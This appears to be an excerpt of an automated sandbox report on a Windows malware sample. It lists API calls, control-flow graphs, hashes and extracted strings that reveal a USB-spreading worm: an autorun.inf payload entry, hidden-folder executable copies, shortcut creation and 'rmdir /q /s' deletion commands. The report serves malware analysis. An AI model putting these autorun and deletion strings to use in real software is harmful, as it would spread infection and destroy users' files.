                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 801014965-0
                                                                                                                                                                                                                          • Opcode ID: 00cc109fcfa51d3a479abcbf0ee4ae0300f6ec2d69621d7ee967bf206d2d22e7
                                                                                                                                                                                                                          • Instruction ID: 94e1e2716a1ba341fd62adcb868f80db46b7d294d77747727738e79ab16cead9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00cc109fcfa51d3a479abcbf0ee4ae0300f6ec2d69621d7ee967bf206d2d22e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7415CB1940744AFDB249FA4DA45AAE7BB8FB09710F20013FE681BB2A1D6785845CF58

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 570 40206e-4020c4 memset CreateProcessW 571 4020c6-4020c8 570->571 572 4020ca-4020ed Sleep ShellExecuteW 570->572 573 4020f5-4020f7 571->573 574 4020f3 572->574 575 4020ef-4020f1 572->575 574->573 575->573
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?), ref: 004020BC
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?), ref: 004020CF
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004020E5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateExecuteProcessShellSleepmemset
                                                                                                                                                                                                                          • String ID: D$open
                                                                                                                                                                                                                          • API String ID: 541629773-2491301029
                                                                                                                                                                                                                          • Opcode ID: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
                                                                                                                                                                                                                          • Instruction ID: 244d5e96a176da2f0eb505dfe5489d13d208d1740a25dc0715168ccfed983adf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1addacf4efe8d5a76caaec790531cad723874f5d98d5e7504146ea4ebc39d0a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D015E71784348BAEB604BE4DD0AFDA7BB8AB08B00F100022F701BE0D0D6F5A0459B6E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 592 40fcc0-40fd91 call 40fe50 CreatePen 595 40fd96-40fdcb 592->595 595->595 596 40fdcd-40fe44 CreateFontIndirectA GetSysColor 595->596
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreatePen.GDI32(00000000), ref: 0040FD85
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(00000028), ref: 0040FDF4
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0040FE0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$ColorFontIndirect
                                                                                                                                                                                                                          • String ID: Taho$dD
                                                                                                                                                                                                                          • API String ID: 4251253423-4141250355
                                                                                                                                                                                                                          • Opcode ID: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction ID: fcce034208925bc6aaa437948b4944f0ceb75c6593572307ad6557a4650ec99a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11c28611addc4e4643f7d3000f30f338fcde4c5a5d46a750fee9a66d035a379
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641C3B08053489FDB24CF1AC98478ABBE4FB49314F60866EE95C8B351C3758946CF95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 597 429b0c-429b2e HeapCreate 598 429b32-429b3b 597->598 599 429b30-429b31 597->599
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00429B21
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction ID: 1759a15e84957c5be0338275ad0a4f9db10762a5021981fbe78d74647f587313
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9428b6c609c3bc6aa73157c2d4ba9f0074f9b95e1476ee6ed7556f4e3d1ad22d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08D05E7AA903456AEB009F76BC08B263BDCE385795F048436F80CC6190E674D9409E48

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 600 2513894-25138c3 call 2513424 VirtualProtect
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 025138B7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction ID: bc46460c34015774e69b47f9b012ece61d5007231c2f20bde70a8b7c47af9205
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802e8bcea279d787bc39c3893ded85e1c047648dd60c64ef52e019ebcc5d0c4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06E07E7590020CBFCF01DF94D94589DBBB5FB08200F008199ED54A6311D6719A20EF51

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 603 2513904-251392a call 2513424 LoadLibraryA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 0251391E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction ID: 70e94ef0705d8944795f621bd3e68051894d38bfb04428e40e77bb417b00b24b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3d3adfbd8a6a9d762b9694168f2a66de57a2cc4f098d6e1f28fa1e92d392a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D04274D0020CAF8B00EFA8D54589CFBF5EB48200F1081AAEC04A7311E671AA50DF95

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 606 40fc5d-40fc6c InvalidateRect call 423ae8 608 40fc71-40fc89 606->608
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040FC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                                                                                          • Opcode ID: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction ID: f450d144a2216a65e4146170c8b5550937e7e802fcbd3a1ddd5c57f0d0063f53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 776248592c92748b837259e60b65d575aaacf644069efe0598aa6ab1a1437174
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6D05E786843029FE714DF20EC84FA633A8EB1A704F46053DE884D72A0D7789501CB5E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 609 2510570-251059f call 25102f0 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02510593
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: f507c9e0af5433cc0cf830fa77d9dbd61e7dd57a332184dfc74cb6d1f31b766d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E07E7590020CAFCF05DF98D94589DBBB5EB08310F00809AED14A6251D6319A60AF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 612 2513854-2513883 call 2513424 VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02513877
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction ID: 79c4ea91e5794106f116139b032c2486399267308026b207cdd2215700a35bdb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E07E7590020CBFCF01DF94D94589DBBB5EB08210F00809AED14A6311D6719A20EF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02510560
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2510000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 437696f84bcd9f717dfd832ed1981901b84c8f2134922846c067bc9ff58d310f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8E09275D0020CEF8B04DF98C84589DBBB5EB08310F008099EC1497310D6319A60DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02513844
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction ID: 4eff367930353053c63b0f322240209b5fddb5f359813d26538f13c8bcb82f78
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE00275D0020CFF8F05DF94D94599DBBB5EB58210F108199ED14A7311D6719A60DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(?,?), ref: 02513781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2430093141.0000000002513000.00000040.00001000.00020000.00000000.sdmp, Offset: 02513000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2513000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction ID: 3c3d3c0a4a7d7ceb44e447619e682906e20eac0cd4d9887bbe492d8d6f9b5e74
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDE02D79D0020CBF8B41EFA8D54989CFBB5EB48210F1081AAEC58A7311E671AA64DF91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$_snwprintfmemset$Attributes$ExistsPathSleep$Delete$Find$ExecuteShell_wfopenfclose$CloseCopyCountCreateDirectoryFirstNextTickfprintffseekftellsrandwcsstr
                                                                                                                                                                                                                          • String ID: %ls*$%ls.lnk$%ls\%s$%ls\%s$%ls\%s.lnk$%ls\_$%ls\_\DeviceManager.exe$%ls\autorun.inf$%s\_\%ls$.bat$.cmd$.com$.dll$.jar$.js$.jse$.lnk$.lnk$.pif$.scr$.vbs$/c move /y "%ls", "%ls"$/c rmdir /q /s "%ls"$B:\$B:\$[autorun]open=_\DeviceManager.exeUseAutoPlay=1$autorun.inf$cmd.exe$cmd.exe$shell32.dll$shell32.dll
                                                                                                                                                                                                                          • API String ID: 2559639764-1539354289
                                                                                                                                                                                                                          • Opcode ID: 9fd6b95f88017d7aafe40e09fdf6497051582b889d73354437b157aed1dca1b3
                                                                                                                                                                                                                          • Instruction ID: 5f2da63774f396e0844ffffcdcfe84a10227647eb49c82ee01ce1ef595922f0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fd6b95f88017d7aafe40e09fdf6497051582b889d73354437b157aed1dca1b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85426F75A00219AADF20AB60DD49FDA73B8BB04744F5040FAF509F61D1EBB89AC48F58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00418016
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418062
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(0044B308,?,00000104), ref: 0041808A
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 004180DE
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00418155
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000400,80070057), ref: 004181D7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00418226
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041825A
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00418278
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000400), ref: 0041828F
                                                                                                                                                                                                                            • Part of subcall function 00418DF0: RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
                                                                                                                                                                                                                            • Part of subcall function 00418DF0: lstrlenW.KERNEL32(00000000), ref: 00418E26
                                                                                                                                                                                                                            • Part of subcall function 00418DF0: _malloc.LIBCMT ref: 00418E87
                                                                                                                                                                                                                            • Part of subcall function 00418DF0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
                                                                                                                                                                                                                            • Part of subcall function 00418DF0: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D
                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 004182F5
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00418358
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,-00000002), ref: 004183AF
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0041841D
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041846D
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 004184A7
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004184F1
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00418577
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 0041858D
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0041865D
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00418673
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004186BB
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00418741
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00418757
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041879D
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00418814
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041885C
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 004188AC
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 004188C2
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041890A
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00418A43
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00418A59
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418A9F
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00418BD7
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 00418BF9
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418C49
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004185D5
                                                                                                                                                                                                                            • Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                            • Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                            • Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 004189AF
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004189F5
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00418B17
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00418B67
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ExceptionRaise$EnterLeave$Delete$lstrlen$ByteCharMultiWide_malloc$Module$ErrorFileFreeHandleHeapInitializeLastName___sbh_find_block___sbh_free_block__lock_memcpy_s
                                                                                                                                                                                                                          • String ID: 0D
                                                                                                                                                                                                                          • API String ID: 1591215200-130544292
                                                                                                                                                                                                                          • Opcode ID: becea20ee48cb570bfbf64149fdab0a5b5000b6fcafa99568f2fc40819b3f4fd
                                                                                                                                                                                                                          • Instruction ID: f694174c2737caa7e057af72c37f0ceb9df478b8584e4924881f72b369627430
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: becea20ee48cb570bfbf64149fdab0a5b5000b6fcafa99568f2fc40819b3f4fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC82E072E01128ABDF10DBA5E844BDFB7B5BF44314F14816AE804B7341EB79AD81CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004032BF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004032D5
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 004032E9
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0040332A
                                                                                                                                                                                                                            • Part of subcall function 004032A4: SetCurrentDirectoryW.KERNEL32(00406BD4), ref: 0040333F
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(000003E8), ref: 004034F0
                                                                                                                                                                                                                            • Part of subcall function 004032A4: PathFindFileNameW.SHLWAPI(?), ref: 0040353F
                                                                                                                                                                                                                            • Part of subcall function 004032A4: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00403575
                                                                                                                                                                                                                            • Part of subcall function 004032A4: DeleteFileW.KERNEL32(00000000), ref: 00403581
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(000001F4), ref: 0040358C
                                                                                                                                                                                                                            • Part of subcall function 004032A4: CopyFileW.KERNEL32(00408260,?,00000000), ref: 004035A0
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(00000064), ref: 004035A8
                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00403361
                                                                                                                                                                                                                          • CharLowerW.USER32(?), ref: 004033FB
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00403430
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00403470
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 004034B0
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004035B5
                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 004035C8
                                                                                                                                                                                                                          • FindClose.KERNEL32(000000FF), ref: 004035DC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
